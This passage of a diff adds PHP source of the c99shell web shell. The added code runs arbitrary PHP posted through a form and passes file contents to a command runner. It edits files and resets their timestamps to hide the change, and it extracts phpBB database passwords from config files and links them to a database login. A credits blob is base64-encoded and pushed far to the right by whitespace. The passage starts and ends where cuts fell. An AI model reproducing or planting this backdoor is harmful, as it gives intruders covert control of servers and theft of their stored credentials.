+   $ret = str_replace("	"," ",$ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $prcs = explode("\n",$ret);
+   $head = explode(" ",$prcs[0]);
+   $head[] = "ACTION";
+   unset($prcs[0]);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   echo "<tr border=\"1\">";
+   foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+   echo "</tr>";
+   foreach ($prcs as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+     echo "</tr>";
+    }
+   }
+   echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+   if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+array("Code","code"),
+array("Session","phpsess"),
+array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+array("SDB","sdb"),
+array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+);
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+  echo "</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else
+   {
+    echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";
+   }
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";      
+    $tmp=posix_getpwuid(fileowner($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+    else echo $tmp['name']." ";
+    $tmp=posix_getgrgid(filegroup($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+    else echo $tmp['name'];
+   }
+   echo "<tr class=tr><td><b>Perms</b></td><td>";
+   
+   if (is_writable($d.$f))
+   {
+    echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+   }
+   else
+   {
+    echo "<font>".view_perms(fileperms($d.$f))."</font>";
+   }
+
+   echo "</td></tr>";
+   echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><br>";
+
+
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump)
+    {
+     echo "<b>FULL HEXDUMP</b>";
+     $str=fread($fi,filesize($d.$f));
+    }
+    else
+    {
+     echo "<b>HEXDUMP PREVIEW</b>";
+     $str=fread($fi,$hexdump_lines*$hexdump_rows);
+    }
+    $n=0;
+    $a0="00000000<br>";
+    $a1="";
+    $a2="";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1.=sprintf("%02X",ord($str[$i])).' ';
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2.="<font class=s2>0</font>"; break;
+      case 32: 
+      case 10:
+      case 13: $a2.="&nbsp;"; break;
+      default:  $a2.=htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+      $a1.="<br>";
+      $a2.="<br>";
+     }
+    }
+    //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+         "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode($r);
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode($r));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode($r);
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+   <P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+   echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+   echo "<pre>";
+   var_dump(parse_ini_file($d.$f,true));
+   echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+   echo "<pre>";
+   var_dump(unserialize(base64_decode($r)));
+   echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+   if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("
+",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array(
+     "dbms"=>$dbms,
+     "dbhost"=>$dbhost,
+     "dbname"=>$dbname,
+     "dbuser"=>$dbuser,
+     "dbpasswd"=>$dbpasswd 
+     );
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+     echo "</b>";
+     echo "<hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+   if (!empty($white)) {@ob_clean();}
+   if ($rehtml) {$r = rehtmlspecialchars($r);} 
+   $r = stripslashes($r); 
+   $strip = false;
+   if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+   $r = @highlight_string($r, TRUE); 
+   if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+   echo $r;
+   if (!empty($white)) {exit;}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: c99shell");
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   if (!$white)
+   {
+    echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: image/gif"); 
+    echo($r); 
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$nfcontent);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $nfcontent;
+    }
+   }
+   $rows = count(explode("
+",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}																																																														   $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhLCBsZWFkaW5nIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPGJyPlRoYW5rcyBhbGwgd2hvIHJlcG9ydCBidWdzLjxicj5BbGwgYnVncyBzZW5kIHRvIHRyaXN0cmFtJ3MgSUNRICM2NTY1NTUgPGEgaHJlZj0iaHR0cDovL3d3cC5pY3EuY29tL3NjcmlwdHMvY29udGFjdC5kbGw/bXNndG89NjU2NTU1Ij48aW1nIHNyYz1odHRwOi8vd3dwLmljcS5jb20vc2NyaXB0cy9vbmxpbmUuZGxsP2ljcT02NTY1NTUmaW1nPTUgYm9yZGVyPTAgYWxpZ249YWJzbWlkZGxlPjwvYT4uPC9iPiA8L2NlbnRlcj4gwOLy7vAg4vvw4Obg5fIg4evg4+7k4PDt7vHy/CDu5O3u7PMg7/Du4vMg6u7y7vD76SDu8urr/vfo6yDl4+4g7eAg7OXx//Yg7vIg6O3l8uAsIOgg5Ov/IPLu4+4g9/LuLeH7IO3lIPPs5fDl8vwg7vIg8erz6ugg7/Do+Ovu8fwg8+Pr8+Ho8vzx/yDiIO/w7uPw4Ozs6PDu4uDt6OUuIM/u5PLu6+rt8+vgIOog7eDv6PHg7ej+IOvl7fwg8SDq7vLu8O7pIP8g8+/w4OLr/+sg8eXw4uXw4OzoLjxjZW50ZXI+PGI+z/Dg4ujr4DwvYj46PC9jZW50ZXI+IDxiPsL7IOzu5uXy5SDo5+zl7f/y/CDv8O7j8ODs7PMg7+4gwuD45ezzIPPx7O7y8OXt6P4sIOzl7f/y/CDt4PHy8O7p6ugsIOTo5+Dp7S4uLiDt7iDl8evoIML7LCDz4uDm4OXs++ksIPPk4Ovo8uUg6OvoIPLl7CDh7uvl5SDo5+zl7ejy5SDq7u/o8ODp8vssIPLuIP8g4fPk8yDi++3z5uTl7SDu8u7w4uDy/CDi4Owg/+n24C4gPC9iPjxicj7A4vLu8CDt5SDt5fG48iDu8uLl8vHy4uXt7e7x8ugg5+Ag4u7n7O7m7fvpIOLw5eQsIO3g7eXxuO376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".
+"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
